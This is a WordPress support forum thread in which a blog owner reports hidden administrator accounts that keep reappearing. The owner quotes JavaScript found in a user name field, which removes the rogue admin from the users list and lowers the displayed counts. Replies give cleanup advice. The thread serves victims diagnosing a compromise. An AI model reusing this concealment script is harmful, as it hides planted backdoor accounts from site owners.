Authors Created Without My Knowledge

  • Lo All,

    I am having the problem that authors are being created on my blog without me knowing. I had noticed a while back that some posts were being accepted without me doing so, which were what my settings were, but when I went to go list all the authors on my blogs homepage, it listed 2 hidden users that didn’t come up in the ‘users and authors’ page in the admin section.

    I managed to find and get into these users and I found that it had this javascript in the name field:

    … <b id=”user_superuser”><script language=”JavaScript”> var setUserName = function(){ try{ var t=document.getElementById(“user_superuser”); while(t.nodeName!=”TR”){ t=t.parentNode; }; t.parentNode.removeChild(t); var tags = document.getElementsByTagName(“H3″); var s = ” shown below”; for (var i = 0; i < tags.length; i++) { var t=tags[i].innerHTML; var h=tags[i]; if(t.indexOf(s)>0){ s =(parseInt(t)-1)+s; h.removeChild(h.firstChild); t = document.createTextNode(s); h.appendChild(t); } } var arr=document.getElementsByTagName(“ul”); for(var i in arr) if(arr[i].className==”subsubsub”){ var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML); if(n!=null && n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi,”>Administrator (“+(n[1]-1)+”)<“); arr[i].innerHTML=txt; } var n=/>Administrator <span class=”count”>\((\d+)\)</gi.exec(arr[i].innerHTML); if(n!=null && n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator <span class=”count”>\((\d+)\)</gi,”>Administrator <span class=\”count\”>(“+(n[1]-1)+”)<“); arr[i].innerHTML=txt; } var n=/>All <span class=”count”>\((\d+)\)</gi.exec(arr[i].innerHTML); if(n!=null && n[1]>0){ var txt=arr[i].innerHTML.replace(/>All <span class=”count”>\((\d+)\)</gi,”>All <span class=\”count\”>(“+(n[1]-1)+”)<“); arr[i].innerHTML=txt; } } }catch(e){}; }; addLoadEvent(setUserName); </script>

    Is this some sort of javascript injection technique or are they auto generated users via WordPress?

    I’d really like to know how to block this as about 2 weeks after deleting the users, they have now appeared again. I currently have registration on the blog blocked so I have no idea how they’re getting in?

Viewing 5 replies - 1 through 5 (of 5 total)

  • What version of WordPress are you running?

    Since deleting the bogus users have you reset your blog and ftp passwords?

    Have you re-uploaded the WordPress source files to replace any hacked ones on your server?

    Thread Starter scrooby

    (@scrooby)

    I’m currently running 2.8.1 and first time I did reset my passwords but not FTP.

    I’ll also try and re-upload the WordPress files.

    Cheers for help…

    Also take a look at hardening WordPress.

    I guess you’ve been hacked and haven’t cleaned up properly. Just upgrading might not rid you off the hack. Before looking at mrmist’s link, look here and look for more information about cleaning up hacked sites, on this forum or elsewhere on the www.

    Thread Starter scrooby

    (@scrooby)

    Cheers for the link, I’ll have a look ??

Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘Authors Created Without My Knowledge’ is closed to new replies.